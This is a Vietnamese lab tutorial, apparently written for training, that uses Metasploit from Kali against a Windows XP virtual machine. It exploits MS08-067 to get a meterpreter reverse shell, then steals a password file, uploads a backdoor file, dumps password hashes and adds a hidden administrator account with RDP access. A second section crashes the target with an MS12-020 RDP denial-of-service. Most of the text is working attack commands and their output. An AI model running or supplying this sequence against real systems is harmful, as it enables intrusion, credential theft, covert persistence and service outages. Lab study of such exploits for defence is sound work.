*** Khai thc m li MS08-067 ***

1. Chun b
- My o Kali Linux:
+ IP: 192.168.1.225
- My o XP:
+ IP: 192.168.1.226
+ Thc hin shared folder trn my XP
chng ta c 4 buoc chinh
dau tien la use exploit -> set payload (tao backdoor)
sau chng ta s set LHOST v RHOST
2. Khai thc m li ms08-067 ti my Kali Linux
- Khi ng chng trnh metasploit
root@kali:~# msfconsole
msf > search ms08-067
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.226 my b tn cng
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.225 my tn cng
msf exploit(ms08_067_netapi) > set target 6
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.1.225:4444
[*] Attempting to trigger the vulnerability...
[*] Sending stage (882688 bytes) to 192.168.1.226
[*] Meterpreter session 1 opened (192.168.1.225:4444 -> 192.168.1.226:1045) at 2015-05-29 03:07:05 -0700
meterpreter >
meterpreter > pwd
C:\WINDOWS\system32
meterpreter > cd C:\\
meterpreter > pwd
C:\
meterpreter > dir
[-] Unknown command: dir.
meterpreter > ls
Listing: C:\
============
Mode
Size
Type Last modified
Name
---------- ---------------100777/rwxrwxrwx 0
fil 2011-06-22 21:45:05 -0700 AUTOEXEC.BAT
100666/rw-rw-rw- 0
fil 2011-06-22 21:45:05 -0700 CONFIG.SYS
40777/rwxrwxrwx 0
dir 2011-06-22 21:51:32 -0700 Documents and Settings
100444/r--r--r-- 0
fil 2011-06-22 21:45:05 -0700 IO.SYS
100444/r--r--r-- 0
fil 2011-06-22 21:45:05 -0700 MSDOS.SYS
100555/r-xr-xr-x 47564
fil 2004-08-03 14:38:34 -0700 NTDETECT.COM
40555/r-xr-xr-x 0
dir 2011-06-22 21:54:29 -0700 Program Files
40777/rwxrwxrwx 0
dir 2015-05-29 18:22:02 -0700 RECYCLER
40777/rwxrwxrwx 0
dir 2015-05-29 18:22:21 -0700 Shared
40777/rwxrwxrwx 0
dir 2011-06-22 21:50:55 -0700 System Volume Information
40777/rwxrwxrwx 0
dir 2015-05-29 19:06:01 -0700 WINDOWS
100666/rw-rw-rw- 211
fil 2011-06-22 21:41:17 -0700 boot.ini
100444/r--r--r-- 250032 fil 2004-08-03 14:59:34 -0700 ntldr
100666/rw-rw-rw- 805306368 fil 2015-05-29 20:32:45 -0700 pagefile.sys
100666/rw-rw-rw- 9
fil 2015-05-29 20:35:48 -0700 password.txt
meterpreter > download password.txt /root/Desktop
[*] downloading: password.txt -> /root/Desktop/password.txt

[*] download : password.txt -> /root/Desktop/password.txt

meterpreter > upload /root/Desktop/backdoor.txt C:\\
[*] uploading : /root/Desktop/backdoor.txt -> C:\
[*] uploaded : /root/Desktop/backdoor.txt -> C:\\backdoor.txt
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:8c025be98d381e3af487c93fef80aadb:978d04d45dfc721a1dbeae72cc15dda1:::
nhanld:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:7135596c4b66eb319e25b73a52c3eaf4:::
meterpreter > run getgui
Windows Remote Desktop Enabler Meterpreter Script
Usage: getgui -u <username> -p <password>
Or: getgui -e
OPTIONS:
-e
Enable RDP only.
-f <opt> Forward RDP Connection.
-h
Help menu.
-p <opt> The Password of the user to add.
-u <opt> The Username of the user to add.
meterpreter > run getgui -u hacker -p 123abc!!! -f
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Setting user account for logon
[*] Adding User: hacker with Password: 123abc!!!
[*] Hiding user from Windows Login screen
[*] Adding User: hacker to local group 'Remote Desktop Users'
[*] Adding User: hacker to local group 'Administrators'
[*] You can now login with the created user
[*] Starting the port forwarding at local port
[-] You must supply a local port, remote host, and remote port.
[*] For cleanup use command: run multi_console_command -rc
/root/.msf4/logs/scripts/getgui/clean_up__20150529.4311.rc

*** Khai thc m li ms12-020 ***

- Nu nh my tnh c li "ms12-020"
=> ms12 : m li nm 2012
020 : m li th 20 trong nm 2012
- Sa li bng cch download bng v li "ms12-020"
=> search google "ms12-020 KB"
=> https://support.microsoft.com/en-us/kb/2671387
- Khai thc m li ms12-020
=> nu nh khai thc thnh cng th my XP c th "restart" hoc "mn hnh xanh"
root@kali:~# msfconsole
msf > search ms12-020
Matching Modules

================
Name

Disclosure Date Rank

----

--------------- ----

Description

-----------

auxiliary/dos/windows/rdp/ms12_020_maxchannelids 2012-03-16
020 Microsoft Remote Desktop Use-After-Free DoS
auxiliary/scanner/rdp/ms12_020_check
Remote Desktop Checker

normal MS12-

normal MS12-020 Microsoft

msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

=> chn m li ms12-020 tn cng 1 PC no
msf auxiliary(ms12_020_maxchannelids) > show options
Module options (auxiliary/dos/windows/rdp/ms12_020_maxchannelids):
Name Current Setting Required Description
---- --------------- -------- ----------RHOST
RPORT 3389

yes
yes

The target address

The target port

mfs > set RHOST 192.168.1.226

=> set RHOST l IP ca my XP
msf > exploit
=> ra lnh khai thc li i vi my XP
msf auxiliary(ms12_020_maxchannelids) > exploit
[*] 192.168.1.226:3389 - Sending MS12-020 Microsoft Remote Desktop Use-After-Free
DoS
[*] 192.168.1.226:3389 - 210 bytes sent
[*] 192.168.1.226:3389 - Checking RDP status...
[+] 192.168.1.226:3389 seems down
[*] Auxiliary module execution completed
Nhn xt:
RHOST: remote Host -> IP ca my XP ( Victim )
RPORT: remote Port -> Port ca ng dng ta ang tn cng
LHOST: local Host -> IP ca my Kali Linux
LPort: local Port -> Port c s trong chng trnh metasploit
SRVHOST: dng ln 1 server gi -> SRVHOST l IP ca my Kali Linux